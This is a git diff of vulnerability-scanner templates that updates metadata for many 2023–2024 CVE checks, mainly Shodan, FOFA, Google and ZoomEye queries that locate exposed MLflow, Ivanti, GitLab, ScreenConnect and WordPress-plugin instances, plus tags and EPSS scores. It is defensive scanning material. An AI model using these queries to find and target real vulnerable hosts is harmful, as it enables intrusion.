a/http/cves/2023/CVE-2023-5830.yaml b/http/cves/2023/CVE-2023-5830.yaml index ff1e8c9e4e..f27c76451d 100644 --- a/http/cves/2023/CVE-2023-5830.yaml +++ b/http/cves/2023/CVE-2023-5830.yaml @@ -27,10 +27,12 @@ info: max-request: 1 vendor: documentlocator product: document_locator - shodan-query: 'title:"Document Locator - WebTools"' + shodan-query: + - 'title:"Document Locator - WebTools"' + - http.title:"document locator - webtools" fofa-query: title="document locator - webtools" google-query: intitle:"document locator - webtools" - tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools + tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools,documentlocator http: - raw: diff --git a/http/cves/2023/CVE-2023-5914.yaml b/http/cves/2023/CVE-2023-5914.yaml index 4d4d1b6635..1cb1794eef 100644 --- a/http/cves/2023/CVE-2023-5914.yaml +++ b/http/cves/2023/CVE-2023-5914.yaml @@ -23,9 +23,11 @@ info: max-request: 1 vendor: cloud product: citrix_storefront - shodan-query: html:"/Citrix/StoreWeb" + shodan-query: + - html:"/Citrix/StoreWeb" + - http.html:"/citrix/storeweb" fofa-query: body="/citrix/storeweb" - tags: cve,cve2024,xss,citrix,storefront + tags: cve,xss,citrix,storefront,cve2023,cloud http: - method: POST diff --git a/http/cves/2023/CVE-2023-5991.yaml b/http/cves/2023/CVE-2023-5991.yaml index 56f289ea71..351995f731 100644 --- a/http/cves/2023/CVE-2023-5991.yaml +++ b/http/cves/2023/CVE-2023-5991.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:/wp-content/plugins/motopress-hotel-booking fofa-query: body=/wp-content/plugins/motopress-hotel-booking publicwww-query: "/wp-content/plugins/motopress-hotel-booking" - tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp + tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp,motopress http: - method: GET diff --git a/http/cves/2023/CVE-2023-6018.yaml b/http/cves/2023/CVE-2023-6018.yaml index 817af599cd..fec49ff6dd 100644 --- a/http/cves/2023/CVE-2023-6018.yaml +++ b/http/cves/2023/CVE-2023-6018.yaml @@ -23,9 +23,11 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" - fofa-query: title="mlflow" + fofa-query: + - title="mlflow" + - app="mlflow" google-query: intitle:"mlflow" - tags: cve,cve2023,mlflow,oss,rce,intrusive + tags: cve,cve2023,mlflow,oss,rce,intrusive,lfprojects variables: model_name: "{{rand_text_alpha(6)}}" diff --git a/http/cves/2023/CVE-2023-6020.yaml b/http/cves/2023/CVE-2023-6020.yaml index 5fe2b87858..eb104322b9 100644 --- a/http/cves/2023/CVE-2023-6020.yaml +++ b/http/cves/2023/CVE-2023-6020.yaml @@ -22,8 +22,12 @@ info: max-request: 1 vendor: ray_project product: ray - shodan-query: http.favicon.hash:463802404 - fofa-query: body="ray dashboard" + shodan-query: + - http.favicon.hash:463802404 + - http.html:"ray dashboard" + fofa-query: + - body="ray dashboard" + - icon_hash=463802404 tags: cve2023,cve,lfi,ray,oos,ray_project http: diff --git a/http/cves/2023/CVE-2023-6021.yaml b/http/cves/2023/CVE-2023-6021.yaml index dbd612b0df..2faaf3f212 100644 --- a/http/cves/2023/CVE-2023-6021.yaml +++ b/http/cves/2023/CVE-2023-6021.yaml @@ -22,8 +22,13 @@ info: max-request: 2 vendor: ray_project product: ray - shodan-query: html:"Ray Dashboard" - fofa-query: body="ray dashboard" + shodan-query: + - html:"Ray Dashboard" + - http.favicon.hash:463802404 + - http.html:"ray dashboard" + fofa-query: + - body="ray dashboard" + - icon_hash=463802404 tags: cve,cve2023,lfi,ray,oos,ray_project http: diff --git a/http/cves/2023/CVE-2023-6023.yaml b/http/cves/2023/CVE-2023-6023.yaml index 25aacd650a..cc4f9e81c2 100644 --- a/http/cves/2023/CVE-2023-6023.yaml +++ b/http/cves/2023/CVE-2023-6023.yaml @@ -25,11 +25,17 @@ info: max-request: 1 vendor: vertaai product: modeldb - shodan-query: http.favicon.hash:-2097033750 - fofa-query: icon_hash=-2097033750 + shodan-query: + - http.favicon.hash:-2097033750 + - http.title:"verta ai" + fofa-query: + - icon_hash=-2097033750 + - title="verta ai" google-query: intitle:"verta ai" - zoomeye-query: title:"Verta AI" - tags: cve,cve2023,lfi,modeldb + zoomeye-query: + - title:"Verta AI" + - title:"verta ai" + tags: cve,cve2023,lfi,modeldb,vertaai http: - method: GET diff --git a/http/cves/2023/CVE-2023-6038.yaml b/http/cves/2023/CVE-2023-6038.yaml index 0fd863efdd..ecb1af872c 100644 --- a/http/cves/2023/CVE-2023-6038.yaml +++ b/http/cves/2023/CVE-2023-6038.yaml @@ -23,7 +23,9 @@ info: max-request: 2 vendor: h2o product: h2o - shodan-query: title:"H2O Flow" + shodan-query: + - title:"H2O Flow" + - http.title:"h2o flow" fofa-query: title="h2o flow" google-query: intitle:"h2o flow" tags: cve,cve2023,h2o-3,h2o,ml diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index a8d8042f29..801d41fbe0 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -22,15 +22,14 @@ info: epss-percentile: 0.90865 cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:* metadata: - max-request: 3 + max-request: 2 vendor: wpfastestcache - product: wp_fastest_cache + product: "wp_fastest_cache" framework: wordpress - shodan-query: http.html:/wp-content/plugins/wp-fastest-cache/ - fofa-query: body=/wp-content/plugins/wp-fastest-cache/ - publicwww-query: /wp-content/plugins/wp-fastest-cache/ - tags: cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin - + shodan-query: "http.html:/wp-content/plugins/wp-fastest-cache/" + fofa-query: "body=/wp-content/plugins/wp-fastest-cache/" + publicwww-query: "/wp-content/plugins/wp-fastest-cache/" + tags: cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin,sqli,wpfastestcache flow: | if (http(1)) { for (let i = 0; i < 2; i++) { diff --git a/http/cves/2023/CVE-2023-6065.yaml b/http/cves/2023/CVE-2023-6065.yaml index 554727c555..c585cad89b 100644 --- a/http/cves/2023/CVE-2023-6065.yaml +++ b/http/cves/2023/CVE-2023-6065.yaml @@ -24,7 +24,7 @@ info: vendor: quttera product: quttera_web_malware_scanner framework: wordpress - tags: cve,cve2023,wp-plugin,quttera,wpscan, + tags: cve,cve2023,wp-plugin,quttera,wpscan,wordpress http: - method: GET diff --git a/http/cves/2023/CVE-2023-6114.yaml b/http/cves/2023/CVE-2023-6114.yaml index f0103e009d..ca409bb30f 100644 --- a/http/cves/2023/CVE-2023-6114.yaml +++ b/http/cves/2023/CVE-2023-6114.yaml @@ -26,7 +26,7 @@ info: product: duplicator framework: wordpress google-query: inurl:"/wp-content/plugins/duplicator" - tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp + tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp,awesomemotive http: - method: GET diff --git a/http/cves/2023/CVE-2023-6360.yaml b/http/cves/2023/CVE-2023-6360.yaml index c823d8f680..ac56d2252c 100644 --- a/http/cves/2023/CVE-2023-6360.yaml +++ b/http/cves/2023/CVE-2023-6360.yaml @@ -30,7 +30,7 @@ info: product: my_calendar framework: wordpress fofa-query: '"wordpress" && body="wp-content/plugins/my-calendar"' - tags: cve,cve2023,sqli,wp,wordpress,wpscan,wp-plugin,my-calendar + tags: cve,cve2023,sqli,wp,wordpress,wpscan,wp-plugin,my-calendar,joedolson flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-6379.yaml b/http/cves/2023/CVE-2023-6379.yaml index 7660993cd5..dda60f5ff6 100644 --- a/http/cves/2023/CVE-2023-6379.yaml +++ b/http/cves/2023/CVE-2023-6379.yaml @@ -27,7 +27,11 @@ info: max-request: 11 vendor: alkacon product: opencms - shodan-query: title:"opencms" + shodan-query: + - title:"opencms" + - http.title:"opencms" + - cpe:"cpe:2.3:a:alkacon:opencms" + - /opencms/ fofa-query: title="opencms" google-query: intitle:"opencms" tags: cve2023,cve,opencms,xss,alkacon diff --git a/http/cves/2023/CVE-2023-6380.yaml b/http/cves/2023/CVE-2023-6380.yaml index 3bd9c533af..3168955dcc 100644 --- a/http/cves/2023/CVE-2023-6380.yaml +++ b/http/cves/2023/CVE-2023-6380.yaml @@ -23,10 +23,13 @@ info: max-request: 1 vendor: alkacon product: opencms - shodan-query: "/opencms/" + shodan-query: + - "/opencms/" + - http.title:"opencms" + - cpe:"cpe:2.3:a:alkacon:opencms" fofa-query: title="opencms" google-query: intitle:"opencms" - tags: cve,cve2023,redirect,opencms + tags: cve,cve2023,redirect,opencms,alkacon http: - method: GET diff --git a/http/cves/2023/CVE-2023-6389.yaml b/http/cves/2023/CVE-2023-6389.yaml index cec769be7b..cb6c3089dd 100644 --- a/http/cves/2023/CVE-2023-6389.yaml +++ b/http/cves/2023/CVE-2023-6389.yaml @@ -25,7 +25,7 @@ info: shodan-query: http.html:/wp-content/plugins/wordpress-toolbar/ fofa-query: body=/wp-content/plugins/wordpress-toolbar/ publicwww-query: "/wp-content/plugins/wordpress-toolbar/" - tags: wpscan,cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp,redirect + tags: wpscan,cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp,redirect,abhinavsingh http: - method: GET diff --git a/http/cves/2023/CVE-2023-6553.yaml b/http/cves/2023/CVE-2023-6553.yaml index 96dc4246a7..33ebd2b226 100644 --- a/http/cves/2023/CVE-2023-6553.yaml +++ b/http/cves/2023/CVE-2023-6553.yaml @@ -28,7 +28,7 @@ info: fofa-query: body=/wp-content/plugins/backup-backup/ publicwww-query: /wp-content/plugins/backup-backup/ google-query: inurl:"/wp-content/plugins/backup-backup/" - tags: packetstorm,cve,cve2023,wp-plugin,rce,unauth,wordpress,wp + tags: packetstorm,cve,cve2023,wp-plugin,rce,unauth,wordpress,wp,backupbliss flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml index df8efb7dc9..34c09512b2 100644 --- a/http/cves/2023/CVE-2023-6567.yaml +++ b/http/cves/2023/CVE-2023-6567.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/learnpress fofa-query: body=/wp-content/plugins/learnpress publicwww-query: "/wp-content/plugins/learnpress" - tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli + tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli,thimpress http: - method: GET diff --git a/http/cves/2023/CVE-2023-6623.yaml b/http/cves/2023/CVE-2023-6623.yaml index 5617af765f..2e87ba92ce 100644 --- a/http/cves/2023/CVE-2023-6623.yaml +++ b/http/cves/2023/CVE-2023-6623.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.html:/wp-content/plugins/essential-blocks/ fofa-query: body=/wp-content/plugins/essential-blocks/ publicwww-query: "/wp-content/plugins/essential-blocks/" - tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi + tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi,wpdeveloper http: - method: GET diff --git a/http/cves/2023/CVE-2023-6634.yaml b/http/cves/2023/CVE-2023-6634.yaml index 39f79c8112..fb238e4d42 100644 --- a/http/cves/2023/CVE-2023-6634.yaml +++ b/http/cves/2023/CVE-2023-6634.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/learnpress fofa-query: body=/wp-content/plugins/learnpress publicwww-query: "/wp-content/plugins/learnpress" - tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,learnpress,rce,intrusive + tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,learnpress,rce,intrusive,thimpress variables: oast: "{{interactsh-url}}/?" padstr: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-6831.yaml b/http/cves/2023/CVE-2023-6831.yaml index 34b6072580..05daacb7c8 100644 --- a/http/cves/2023/CVE-2023-6831.yaml +++ b/http/cves/2023/CVE-2023-6831.yaml @@ -26,7 +26,9 @@ info: vendor: lfprojects product: mlflow shodan-query: "http.title:\"mlflow\"" - fofa-query: title="mlflow" + fofa-query: + - title="mlflow" + - app="mlflow" google-query: intitle:"mlflow" tags: cve,cve2023,mlflow,pathtraversal,lfprojects,intrusive diff --git a/http/cves/2023/CVE-2023-6875.yaml b/http/cves/2023/CVE-2023-6875.yaml index d12431188f..5af162471b 100644 --- a/http/cves/2023/CVE-2023-6875.yaml +++ b/http/cves/2023/CVE-2023-6875.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/post-smtp fofa-query: body=/wp-content/plugins/post-smtp publicwww-query: "/wp-content/plugins/post-smtp" - tags: cve,cve2023,wp,wp-plugin,wordpress,smtp,mailer,auth-bypass + tags: cve,cve2023,wp,wp-plugin,wordpress,smtp,mailer,auth-bypass,wpexperts variables: fcm_token: "{{randstr_1}}" device: "{{randstr_2}}" diff --git a/http/cves/2023/CVE-2023-6909.yaml b/http/cves/2023/CVE-2023-6909.yaml index f54123a4f1..646cc1ac80 100644 --- a/http/cves/2023/CVE-2023-6909.yaml +++ b/http/cves/2023/CVE-2023-6909.yaml @@ -28,9 +28,11 @@ info: vendor: lfprojects product: mlflow shodan-query: "http.title:\"mlflow\"" - fofa-query: title="mlflow" + fofa-query: + - title="mlflow" + - app="mlflow" google-query: intitle:"mlflow" - tags: cve,cve2023,mlflow,lfi,intrusive + tags: cve,cve2023,mlflow,lfi,intrusive,lfprojects http: - raw: diff --git a/http/cves/2023/CVE-2023-6977.yaml b/http/cves/2023/CVE-2023-6977.yaml index 5d6745fa14..cdb0670438 100644 --- a/http/cves/2023/CVE-2023-6977.yaml +++ b/http/cves/2023/CVE-2023-6977.yaml @@ -27,7 +27,9 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" - fofa-query: title="mlflow" + fofa-query: + - title="mlflow" + - app="mlflow" google-query: intitle:"mlflow" tags: cve,cve2023,mlflow,oss,lfi,intrusive,lfprojects diff --git a/http/cves/2023/CVE-2023-6989.yaml b/http/cves/2023/CVE-2023-6989.yaml index eae3fd1da0..53ce0b1af0 100644 --- a/http/cves/2023/CVE-2023-6989.yaml +++ b/http/cves/2023/CVE-2023-6989.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:/wp-content/plugins/wp-simple-firewall fofa-query: body=/wp-content/plugins/wp-simple-firewall publicwww-query: "/wp-content/plugins/wp-simple-firewall" - tags: wpscan,cve,cve2023,wp,wordpress,wp-plugin,lfi,shield-security + tags: wpscan,cve,cve2023,wp,wordpress,wp-plugin,lfi,shield-security,getshieldsecurity http: - raw: diff --git a/http/cves/2023/CVE-2023-7028.yaml b/http/cves/2023/CVE-2023-7028.yaml index 4482533320..57b2e30ef2 100644 --- a/http/cves/2023/CVE-2023-7028.yaml +++ b/http/cves/2023/CVE-2023-7028.yaml @@ -25,7 +25,10 @@ info: max-request: 6 vendor: gitlab product: gitlab - shodan-query: title:"Gitlab" + shodan-query: + - title:"Gitlab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive,kev diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index 33b6f5b735..4629219165 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -22,11 +22,13 @@ info: cpe: cpe:2.3:a:ssssssss:spider-flow:0.4.3:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: ssssssss - product: spider-flow - fofa-query: app="SpiderFlow" - tags: cve,cve2024,spiderflow,crawler,unauth,rce + product: "spider-flow" + fofa-query: + - "app=\"SpiderFlow\"" + - app="spiderflow" + tags: cve,cve2024,spiderflow,crawler,unauth,rce,ssssssss flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-0200.yaml b/http/cves/2024/CVE-2024-0200.yaml index b2fa1f6f6a..bd4b85c563 100644 --- a/http/cves/2024/CVE-2024-0200.yaml +++ b/http/cves/2024/CVE-2024-0200.yaml @@ -22,10 +22,13 @@ info: cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:* metadata: verified: true + max-request: 7 vendor: github - product: enterprise_server - shodan-query: title:"GitHub Enterprise" - fofa-query: app="Github-Enterprise" + product: "enterprise_server" + shodan-query: + - "title:\"GitHub Enterprise\"" + - micro focus dsd + fofa-query: "app=\"Github-Enterprise\"" tags: cve,cve2024,rce,github,enterprise variables: username: "{{username}}" diff --git a/http/cves/2024/CVE-2024-0204.yaml b/http/cves/2024/CVE-2024-0204.yaml index 3df53ddbe7..f7d878effb 100644 --- a/http/cves/2024/CVE-2024-0204.yaml +++ b/http/cves/2024/CVE-2024-0204.yaml @@ -17,18 +17,26 @@ info: cvss-score: 9.8 cve-id: CVE-2024-0204 cwe-id: CWE-425 - epss-score: 0.53864 - epss-percentile: 0.97564 + epss-score: 0.50096 + epss-percentile: 0.97519 cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: fortra product: goanywhere_managed_file_transfer - shodan-query: http.favicon.hash:1484947000,1828756398,1170495932 - fofa-query: app="GoAnywhere-MFT" - zoomeye-query: app:"Fortra GoAnywhere-MFT" - tags: packetstorm,cve,cve2024,auth-bypass,goanywhere + shodan-query: + - http.favicon.hash:1484947000,1828756398,1170495932 + - http.favicon.hash:1484947000 + fofa-query: + - app="GoAnywhere-MFT" + - icon_hash=1484947000 + - icon_hash=1484947000,1828756398,1170495932 + - app="goanywhere-mft" + zoomeye-query: + - app:"Fortra GoAnywhere-MFT" + - app:"fortra goanywhere-mft" + tags: packetstorm,cve,cve2024,auth-bypass,goanywhere,fortra http: - method: GET diff --git a/http/cves/2024/CVE-2024-0235.yaml b/http/cves/2024/CVE-2024-0235.yaml index 5babf693a2..98bef039f1 100644 --- a/http/cves/2024/CVE-2024-0235.yaml +++ b/http/cves/2024/CVE-2024-0235.yaml @@ -23,14 +23,23 @@ info: epss-percentile: 0.19233 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: + max-request: 1 vendor: myeventon product: eventon framework: wordpress - shodan-query: vuln:CVE-2023-2796 - fofa-query: wp-content/plugins/eventon/ - publicwww-query: "/wp-content/plugins/eventon/" - google-query: inurl:"/wp-content/plugins/eventon/" - tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan + shodan-query: + - "vuln:CVE-2023-2796" + - http.html:/wp-content/plugins/eventon-lite/ + - http.html:/wp-content/plugins/eventon/ + fofa-query: + - "wp-content/plugins/eventon/" + - body=/wp-content/plugins/eventon/ + - body=/wp-content/plugins/eventon-lite/ + publicwww-query: + - "/wp-content/plugins/eventon/" + - /wp-content/plugins/eventon-lite/ + google-query: "inurl:\"/wp-content/plugins/eventon/\"" + tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan,myeventon http: - method: POST diff --git a/http/cves/2024/CVE-2024-0305.yaml b/http/cves/2024/CVE-2024-0305.yaml index 1a1258ea1b..239fd5cf77 100644 --- a/http/cves/2024/CVE-2024-0305.yaml +++ b/http/cves/2024/CVE-2024-0305.yaml @@ -26,11 +26,14 @@ info: max-request: 1 vendor: ncast_project product: ncast - fofa-query: app="Ncast-产品" && title=="高清智能录播系统" - zoomeye-query: title:"高清智能录播系统" shodan-query: http.title:"高清智能录播系统" + fofa-query: + - app="Ncast-产品" && title=="高清智能录播系统" + - title="高清智能录播系统" + - app="ncast-产品" && title=="高清智能录播系统" google-query: intitle:"高清智能录播系统" - tags: cve,cve2024,ncast,rce + zoomeye-query: title:"高清智能录播系统" + tags: cve,cve2024,ncast,rce,ncast_project http: - raw: diff --git a/http/cves/2024/CVE-2024-0713.yaml b/http/cves/2024/CVE-2024-0713.yaml index 614e47bf2b..de4cc34394 100644 --- a/http/cves/2024/CVE-2024-0713.yaml +++ b/http/cves/2024/CVE-2024-0713.yaml @@ -23,8 +23,8 @@ info: max-request: 2 vendor: monitorr product: monitorr - fofa-query: "icon_hash=\"-211006074\"" shodan-query: http.favicon.hash:"-211006074" + fofa-query: "icon_hash=\"-211006074\"" tags: cve,cve2024,file-upload,intrusive,monitorr variables: file: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2024/CVE-2024-1021.yaml b/http/cves/2024/CVE-2024-1021.yaml index fd8249780b..bf2d604f9e 100644 --- a/http/cves/2024/CVE-2024-1021.yaml +++ b/http/cves/2024/CVE-2024-1021.yaml @@ -21,17 +21,17 @@ info: cvss-score: 9.8 cve-id: CVE-2024-1021 cwe-id: CWE-918 - epss-score: 0.01163 - epss-percentile: 0.84597 + epss-score: 0.00973 + epss-percentile: 0.83349 cpe: cpe:2.3:a:ruifang-tech:rebuild:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: ruifang-tech product: rebuild - fofa-query: "icon_hash=\"871154672\"" shodan-query: http.favicon.hash:"871154672" - tags: cve2024,cve,rebuild,ssrf + fofa-query: "icon_hash=\"871154672\"" + tags: cve2024,cve,rebuild,ssrf,ruifang-tech http: - method: GET diff --git a/http/cves/2024/CVE-2024-1061.yaml b/http/cves/2024/CVE-2024-1061.yaml index 413103a138..aaf869114c 100644 --- a/http/cves/2024/CVE-2024-1061.yaml +++ b/http/cves/2024/CVE-2024-1061.yaml @@ -31,7 +31,7 @@ info: product: html5_video_player framework: wordpress fofa-query: "\"wordpress\" && body=\"html5-video-player\"" - tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player + tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player,bplugins http: - method: GET diff --git a/http/cves/2024/CVE-2024-1071.yaml b/http/cves/2024/CVE-2024-1071.yaml index 1b2a26a019..99573cf8f1 100644 --- a/http/cves/2024/CVE-2024-1071.yaml +++ b/http/cves/2024/CVE-2024-1071.yaml @@ -27,7 +27,7 @@ info: fofa-query: body="/wp-content/plugins/ultimate-member" publicwww-query: "/wp-content/plugins/ultimate-member/" zoomeye-query: app:"WordPress Ultimate Member Plugin" - tags: cve,cve2024,ultimate-member,wpscan,wordpress,wp-plugin + tags: cve,cve2024,ultimate-member,wpscan,wordpress,wp-plugin,sqli http: - raw: diff --git a/http/cves/2024/CVE-2024-1183.yaml b/http/cves/2024/CVE-2024-1183.yaml index 06f1156ff3..d6a169dc89 100644 --- a/http/cves/2024/CVE-2024-1183.yaml +++ b/http/cves/2024/CVE-2024-1183.yaml @@ -14,8 +14,8 @@ info: cvss-score: 6.5 cve-id: CVE-2024-1183 cwe-id: CWE-601 - epss-score: 0.00061 - epss-percentile: 0.24702 + epss-score: 0.00076 + epss-percentile: 0.32361 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-1208.yaml b/http/cves/2024/CVE-2024-1208.yaml index ea22b280ea..c02512df21 100644 --- a/http/cves/2024/CVE-2024-1208.yaml +++ b/http/cves/2024/CVE-2024-1208.yaml @@ -26,10 +26,10 @@ info: vendor: learndash product: learndash framework: wordpress - publicwww-query: "/wp-content/plugins/sfwd-lms" - google-query: inurl:"/wp-content/plugins/sfwd-lms" shodan-query: http.html:/wp-content/plugins/sfwd-lms fofa-query: body=/wp-content/plugins/sfwd-lms + publicwww-query: "/wp-content/plugins/sfwd-lms" + google-query: inurl:"/wp-content/plugins/sfwd-lms" tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash http: diff --git a/http/cves/2024/CVE-2024-1209.yaml b/http/cves/2024/CVE-2024-1209.yaml index d0eb06f584..11a9799da0 100644 --- a/http/cves/2024/CVE-2024-1209.yaml +++ b/http/cves/2024/CVE-2024-1209.yaml @@ -26,10 +26,10 @@ info: vendor: learndash product: learndash framework: wordpress - publicwww-query: "/wp-content/plugins/sfwd-lms" - google-query: inurl:"/wp-content/plugins/sfwd-lms" shodan-query: http.html:/wp-content/plugins/sfwd-lms fofa-query: body=/wp-content/plugins/sfwd-lms + publicwww-query: "/wp-content/plugins/sfwd-lms" + google-query: inurl:"/wp-content/plugins/sfwd-lms" tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash http: diff --git a/http/cves/2024/CVE-2024-1212.yaml b/http/cves/2024/CVE-2024-1212.yaml index eeec45de5e..78d1d486cb 100644 --- a/http/cves/2024/CVE-2024-1212.yaml +++ b/http/cves/2024/CVE-2024-1212.yaml @@ -17,8 +17,8 @@ info: cvss-score: 10 cve-id: CVE-2024-1212 cwe-id: CWE-78 - epss-score: 0.00721 - epss-percentile: 0.802 + epss-score: 0.00213 + epss-percentile: 0.59325 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-1709.yaml b/http/cves/2024/CVE-2024-1709.yaml index c74b6d0427..254e9129a9 100644 --- a/http/cves/2024/CVE-2024-1709.yaml +++ b/http/cves/2024/CVE-2024-1709.yaml @@ -26,9 +26,16 @@ info: vendor: connectwise product: screenconnect shodan-query: http.favicon.hash:-82958153 - fofa-query: app="ScreenConnect-Remote-Support-Software" - zoomeye-query: app:"ScreenConnect Remote Management Software" - hunter-query: app.name="ConnectWise ScreenConnect software" + fofa-query: + - app="ScreenConnect-Remote-Support-Software" + - app="screenconnect-remote-support-software" + - icon_hash=-82958153 + zoomeye-query: + - app:"ScreenConnect Remote Management Software" + - app:"screenconnect remote management software" + hunter-query: + - app.name="ConnectWise ScreenConnect software" + - app.name="connectwise screenconnect software" tags: cve,cve2024,screenconnect,connectwise,auth-bypass,kev variables: string: "{{rand_text_alpha(10)}}" diff --git a/http/cves/2024/CVE-2024-21644.yaml b/http/cves/2024/CVE-2024-21644.yaml index 86bd3dc8a4..ea8a52ae6b 100644 --- a/http/cves/2024/CVE-2024-21644.yaml +++ b/http/cves/2024/CVE-2024-21644.yaml @@ -27,10 +27,21 @@ info: max-request: 1 vendor: pyload product: pyload - shodan-query: html:"pyload" - zoomeye-query: app:"pyLoad" - fofa-query: title="login - pyload" - google-query: intitle:"login - pyload" + shodan-query: + - html:"pyload" + - http.title:"login - pyload" + - http.html:"pyload" + - http.title:"pyload" + fofa-query: + - title="login - pyload" + - body="pyload" + - title="pyload" + google-query: + - intitle:"login - pyload" + - intitle:"pyload" + zoomeye-query: + - app:"pyLoad" + - app:"pyload" tags: cve,cve2024,python,pip,pyload,access-control http: diff --git a/http/cves/2024/CVE-2024-21645.yaml b/http/cves/2024/CVE-2024-21645.yaml index 0250d430b5..db0f57cbf4 100644 --- a/http/cves/2024/CVE-2024-21645.yaml +++ b/http/cves/2024/CVE-2024-21645.yaml @@ -17,17 +17,26 @@ info: cvss-score: 5.3 cve-id: CVE-2024-21645 cwe-id: CWE-74 - epss-score: 0.00046 - epss-percentile: 0.13723 + epss-score: 0.0112 + epss-percentile: 0.84559 cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: pyload product: pyload - shodan-query: "title:\"pyload\"" - fofa-query: title="login - pyload" - google-query: intitle:"login - pyload" + shodan-query: + - "title:\"pyload\"" + - http.title:"login - pyload" + - http.html:"pyload" + - http.title:"pyload" + fofa-query: + - title="login - pyload" + - body="pyload" + - title="pyload" + google-query: + - intitle:"login - pyload" + - intitle:"pyload" zoomeye-query: app:"pyload" tags: cve,cve2024,pyload,authenticated,injection variables: diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml index 53c6de5d31..52b9c55411 100644 --- a/http/cves/2024/CVE-2024-21683.yaml +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -21,7 +21,8 @@ info: epss-percentile: 0.0866 metadata: verified: true - fofa-query: app="ATLASSIAN-Confluence" + max-request: 3 + fofa-query: "app=\"ATLASSIAN-Confluence\"" tags: cve,cve2024,atlassian,confluence,rce,authenticated,intrusive variables: username: "{{username}}" diff --git a/http/cves/2024/CVE-2024-21887.yaml b/http/cves/2024/CVE-2024-21887.yaml index 5efad6cb3e..a99d6d3e8e 100644 --- a/http/cves/2024/CVE-2024-21887.yaml +++ b/http/cves/2024/CVE-2024-21887.yaml @@ -23,8 +23,13 @@ info: max-request: 1 vendor: ivanti product: connect_secure - shodan-query: "html:\"welcome.cgi?p=logo\"" - fofa-query: body="welcome.cgi?p=logo" + shodan-query: + - "html:\"welcome.cgi?p=logo\"" + - http.title:"ivanti connect secure" + - http.html:"welcome.cgi?p=logo" + fofa-query: + - body="welcome.cgi?p=logo" + - title="ivanti connect secure" google-query: intitle:"ivanti connect secure" tags: packetstorm,cve,cve2024,kev,rce,ivanti diff --git a/http/cves/2024/CVE-2024-21893.yaml b/http/cves/2024/CVE-2024-21893.yaml index f111b9e3e3..2e2ce56459 100644 --- a/http/cves/2024/CVE-2024-21893.yaml +++ b/http/cves/2024/CVE-2024-21893.yaml @@ -24,8 +24,13 @@ info: max-request: 1 vendor: ivanti product: connect_secure - shodan-query: "html:\"welcome.cgi?p=logo\"" - fofa-query: body="welcome.cgi?p=logo" + shodan-query: + - "html:\"welcome.cgi?p=logo\"" + - http.title:"ivanti connect secure" + - http.html:"welcome.cgi?p=logo" + fofa-query: + - body="welcome.cgi?p=logo" + - title="ivanti connect secure" google-query: intitle:"ivanti connect secure" tags: cve,cve2024,kev,ssrf,ivanti diff --git a/http/cves/2024/CVE-2024-22024.yaml b/http/cves/2024/CVE-2024-22024.yaml index 